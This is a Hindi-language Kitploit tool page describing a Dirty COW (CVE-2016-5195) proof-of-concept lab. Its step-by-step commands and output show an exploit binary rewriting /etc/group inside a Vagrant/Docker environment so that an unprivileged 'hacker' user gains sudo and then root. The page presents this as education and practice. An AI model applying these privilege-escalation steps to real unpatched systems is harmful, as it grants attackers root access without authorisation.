Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Dirty-COW-CVE-2016-5195- — Exploit the dirtycow vulnerability to login as root | Kitploit
उपकरण/GitHubGitHub/zakariamaaraki/dirty-cow-cve-2016-5195-
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationContainer EscapeLabs & Practice
GitHubzakariamaaraki/dirty-cow-cve-2016-5195-

Dirty-COW-CVE-2016-5195-

Exploit the dirtycow vulnerability to login as root

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
25 साल पहलेअभी तक समीक्षित नहीं

Dirtyc0w Docker POC

आवश्यक शर्तें:

  • Vagrant स्थापित

उपयोग कैसे करें

पहले प्रोजेक्ट को क्लोन करें git clone https://github.com/BrolyCode/Dirty-Cow.git फ़ोल्डर में जाएं cd Dirty-Cow फिर कमांड से वातावरण चलाएं

root@kitploit:~
vagrant up

सर्वर बनने के बाद, हम उसमें ssh करेंगे

root@kitploit:~
vagrant ssh

रूट उपयोगकर्ता में बदलें

root@kitploit:~
sudo -i

अब हम हैकर के रूप में लॉग इन कर सकते हैं

root@kitploit:~
docker exec -it -u hacker nginx bash

जिस डायरेक्टरी में हम लॉग इन हैं, उसमें निम्नलिखित फ़ाइलें हैं

root@kitploit:~
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c

अगर हम फ़ाइल /etc/group को cat करें तो हम देखते हैं

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

हम रूट के रूप में लॉगिन करने का प्रयास कर सकते हैं

root@kitploit:~
sudo -i

लेकिन सिस्टम मना करेगा, क्योंकि हमारे पास पहुंच का अधिकार नहीं है। अब हम /etc/group पर विफलता का शोषण करेंगे

root@kitploit:~
./dirtyc0w 

यह टर्मिनल पर निम्नलिखित प्रिंट करेगा, हमें थोड़ा समय (2/3 मिनट) इंतजार करना होगा।

root@kitploit:~
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000

फिर हम फिर से /etc/group को cat करेंगे

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

रूट के रूप में लॉगिन करें

root@kitploit:~
sudo -i

root@27862a2f9973:~#

सफाई

अपने होस्ट मशीन के टर्मिनल पर वापस जाएं और vagrant destroy कमांड दें

टूल डाउनलोड करें